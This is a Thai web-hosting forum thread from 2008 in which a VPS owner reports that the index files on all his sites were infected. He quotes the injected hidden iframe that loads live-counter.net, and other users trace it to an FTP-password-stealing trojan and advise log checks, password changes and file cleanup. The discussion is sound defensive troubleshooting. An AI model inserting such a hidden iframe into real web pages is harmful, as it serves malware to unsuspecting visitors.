Server โดนไวรัสครับ

tana · July 29, 2008, 7:00am

อาการแบบนี้ไม่รู้ว่าเรียกว่าโดนไวรัสหรือป่าวครับผม
คือผมใช้ VPS นะครับทำเว็บส่วนตัวประมาณ 10 เว็บ
เหตุเกิดขึ้นเมื่อวานครับ

คือไฟล์ทุกไฟล์ที่มีชื่อ index อยู่ เช่น
index.php
Boardindex.php
etc.
(ไม่ว่าไฟล์ใดที่มีคำว่า index เป็นชื่อไฟล์อยู่)

ไฟล์เหล่านั้นเมื่อเข้าไปดูโค้ด จะถูกแทรกโค้ดนี้ไปด้วยครับ

<iframe src=\"http://live-counter.net/?click=9191437\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"

ซึ่งโค้ดนี้ โปรแกรมแอนตี้ไวรัสมองว่าเป็นโทรจันครับ

ตอนแรกผมคิดว่าเป็นรูรั่วที่ระบบ SMF ครับ แต่ลองดูไปดูมามันเกิดกับทุกๆเว็บที่อยู่บน server นี้ครับ
ตอนนี้ผมแก้ปัญหาเฉพาะหน้าโดยการเอาโค้ดดังกล่าว ออกจากหน้าที่ถูกเรียกใช้เป็นประจำแล้วครับ
แต่ยังมีไฟล์อีกมากที่ติดโค้ดดังกล่าวอีกครับ

ผมอยากจะขอคำแนะนำจากพี่ครับ
1.จะแก้ไขปัญหานี้ได้อย่างไรครับ มีวิธีที่จะแก้แบบไม่ต้องเปิดแก้ทีละไฟล์หรือป่าวครับ
2.จะป้องกันไม่ให้เกิดขึ้นต่อไปได้หรือไม่ อย่างไรครับ
3.สาเหตุที่เกิดอารการแบบนี้มาจากอะไรครับ

ขอบคุณครับ

ปล. CenOS ครับ

ลองไล่ๆอ่านดูเจอในนี้

แล้วยังไม่ค่อยเคลียอะครับ

BWebMass · July 29, 2008, 7:38am

บางทีก็เห็นว่ามันติดที่ตัว server
แต่หลายครั้งก็บอกว่ามันติดจากตัวเครือข่ายครับ
ซึ่งตัวเครือข่ายที่ว่านี้มันมีได้ทั้ง จาก isp ที่เราใช้งาน (เจอไม่บ่อย) และเกิดได้จาก internet ที่เราใช้งานอยู่ (โดยเฉพาะคนที่ใช้แบบแชร์ทั้งหลายแหล่)

ยังงงอยู่เหมือนกัน แต่ถ้าโดนทุกเว็บ แนวโน้มติดที่ตัวเครื่อง หรือไม่ก็ติดจากฝั่ง ISP นั้นสูงมากกว่าครับ

mean · July 29, 2008, 10:23am

สำรวจครับ เว็บที่เครื่องเรา index file เว็บอื่นๆ ติดไหม
หากเป็นเว็บเดียวพิจารณาแก้ไข ที่ user นั้นๆ ครับ
เพราะบางทีเครื่อง ผู้ใช้เอง ติดและทำการอับโหลดมา
หรือทำการ edit file ก็ติดตอน save ครับ

SiamDhost.Com · July 29, 2008, 10:30am

แล้วไอไฟล์นี้อ่ะ เครื่องมันติดไวรัสใหมอ่ะ เวลาสร้างเพลนทีไร มีมาด้วยทุกที ไม่รู้เอาไว้ทำอะไร

http://61.47.41.131/~test01/index.htm

(มันจะมานามสกุล .htm อ่ะครับ)

ใช่ใหมอ่ะ

Freedomlover · July 29, 2008, 11:00am

ลองเข้าไปดูที่ /domains/default ครับ โหลดไฟล์ index.htm มาดู code

iDeal · July 29, 2008, 11:06am

ช่วยตอบข้อ 1 นะครับ แบบ manual แก้ไขแต่ละไฟล์ในเครื่องของเรา

แก้ไขโดยไม่ต้องเปิดทีละไฟล์ ก็ใช้โปรแกรม Simple Search-Replace ดาวน์โหลดจาก http://www.rjlsoftware.com/software/utility/search/ จากนั้นก็ browse ทั้งโฟลเดอร์งานที่คิดว่าติดไวรัสครับ ใช้การ Search และ Replace ด้วยความว่างเปล่าครับ

SiamDhost.Com · July 29, 2008, 11:41am

[quote author=iDeal link=topic=12629.msg123150#msg123150 date=1217304371]
ช่วยตอบข้อ 1 นะครับ แบบ manual แก้ไขแต่ละไฟล์ในเครื่องของเรา

แก้ไขโดยไม่ต้องเปิดทีละไฟล์ ก็ใช้โปรแกรม Simple Search-Replace ดาวน์โหลดจาก http://www.rjlsoftware.com/software/utility/search/

bioice · July 29, 2008, 12:17pm

มันเป็นไวรัสของเวป money2008.com
โดยจะทำให้คนเข้าเวปเจอการขโมยข้อมูลพวก บัตรเครดิตและข้อมูลส่วนตัว

bioice · July 29, 2008, 12:29pm

ชื่อทางการ PWS-FerTP เจาะผ่าน ftp พึงมีการตรวจพบเมื่อ 2เดือนก่อน antivirus ที่แสกนเจอ คือเมกาฟีและร่มแดง
โดยจะทำการเจาะระบบผ่านทางรูรั่ว FTP โดยเข้าไปเพิ่มโค้ตของ index.htm main.htm default.htm index.php main.php default.php
โดยติดได้ทั้งเครื่องที่เป็นwindows และlinux ส่วนวิธีแก้ ถามเองละกัน

tana · July 29, 2008, 12:56pm

ไฟล์ index ทุกเว็บใน server เลยครับ

[quote author=iDeal link=topic=12629.msg123150#msg123150 date=1217304371]
ช่วยตอบข้อ 1 นะครับ แบบ manual แก้ไขแต่ละไฟล์ในเครื่องของเรา

แก้ไขโดยไม่ต้องเปิดทีละไฟล์ ก็ใช้โปรแกรม Simple Search-Replace ดาวน์โหลดจาก RJL Software - Software - Utility - Simple Search-Replace

ems · July 29, 2008, 1:09pm

การแก้ไข

ห้ามใช้ IE ในการ FTP ใครชอบใช้ให้เลิกซ่ะ
เครื่องที่จะใช้ upload หมั่น scan virus
หลังจาก upload ข้อมูลเสร็จ ให้ทำการเปลี่ยน Password ที่ server ทันที
ลองอ่าน log ไฟล์ “cat /va/log/proftpd/access.log” ดูว่า ip ไหนเข้ามา ftp เปลี่ยนไฟล์ ให้ทำการ Block IP นั้นซะ

kke · July 29, 2008, 3:28pm

ที่เครื่องมี user ที่ ftp ได้ทุกโดเมนอยู่หรือเปล่าครับ
เพราะปกติไวรัสต้วนี้จะดัก ftp password จากเครื่องที่ใช้ ftp แก้ไขเว็บ
เสร็จแล้วมันก็เข้าไปแก้ไขไฟล์เราผ่านทาง ftp ด้วย password ที่ดักได้
ถ้าดูจาก ftp log จะเห็นชัดเจนเลย ว่ามี connection เข้ามาแก้ไขไฟล์
และใน log ยังบอกอีกด้วยว่าใช้ user อะไรมาจาก ip ใหน

วิธีการแก้ไข

เปลี่ยนรหัส ftp ของ user ที่โดนใหม่ (หาเครื่องอื่นเข้าไปเปลี่ยน)
แก้ไขไฟล์ที่ถูกแก้ไขกลับมาเหมือนเดิม (ลบ tag ที่เพิ่มมาออก)
scan virus ในเครื่องที่ติดโทรจัน (เครื่องที่โดนดัก password)

แต่ถ้าโดนทั้งเครื่องแบบว่าไม่มี log การเข้ามาทาง ftp อันนี้แสดงว่าโดน hack ทางช่องโหว่ใดซักอย่าง
ปัญหาจะหนักกว่าแบบแรก คือต้องหาช่องโหว่ให้พบ ไม่งั้นไว้ก็มาอีก

ตอนนี้แนะนำให้เก็บ backup ไว้ให้ดี

tana · July 30, 2008, 10:21pm

ตอนนี้พอทราบจับทางได้แล้วครับ
รายละเอียดครับ > http://svz.in.th/node/virus-in-zone-it.html

ThaiTumweb · October 27, 2008, 12:45pm

ให้ลูกค้าแก้รหัส ftp ทุกเว็บที่โดน
เลิกใช้งานโปรแกรม ftp เถือน โดยเฉพาะที่โหลดจากเว็บแครก หรือ bit ให้ใช้ Filezilla แทน
แล้วก็ให้คนที่เข้าแล้วเจอ แสกนไรวัสเครื่องตัวเองด้วย

smartnet.co.th · October 27, 2008, 1:12pm

เห็นๆข้างบนบอกให้เลิกใช้หลายอย่างแล้วเหมือนกัน อิอิ มีอีกอย่าง…เลิกใช้ windows ไปเลยครับ

siamwebsolution.com · October 27, 2008, 1:19pm

ที่เครื่องมี user ที่ ftp ได้ทุกโดเมนอยู่หรือเปล่าครับ
เพราะปกติไวรัสต้วนี้จะดัก ftp password จากเครื่องที่ใช้ ftp แก้ไขเว็บ
เสร็จแล้วมันก็เข้าไปแก้ไขไฟล์เราผ่านทาง ftp ด้วย password ที่ดักได้
ถ้าดูจาก ftp log จะเห็นชัดเจนเลย ว่ามี connection เข้ามาแก้ไขไฟล์
และใน log ยังบอกอีกด้วยว่าใช้ user อะไรมาจาก ip ใหน

วิธีการแก้ไข

เปลี่ยนรหัส ftp ของ user ที่โดนใหม่ (หาเครื่องอื่นเข้าไปเปลี่ยน)

แก้ไขไฟล์ที่ถูกแก้ไขกลับมาเหมือนเดิม (ลบ tag ที่เพิ่มมาออก)

scan virus ในเครื่องที่ติดโทรจัน (เครื่องที่โดนดัก password)

แต่ถ้าโดนทั้งเครื่องแบบว่าไม่มี log การเข้ามาทาง ftp อันนี้แสดงว่าโดน hack ทางช่องโหว่ใดซักอย่าง
ปัญหาจะหนักกว่าแบบแรก คือต้องหาช่องโหว่ให้พบ ไม่งั้นไว้ก็มาอีก

ตอนนี้แนะนำให้เก็บ backup ไว้ให้ดี

อันนี้แหละครับ

thaiman2521 · October 27, 2008, 6:42pm

confirm ของคุณ KKE ครับ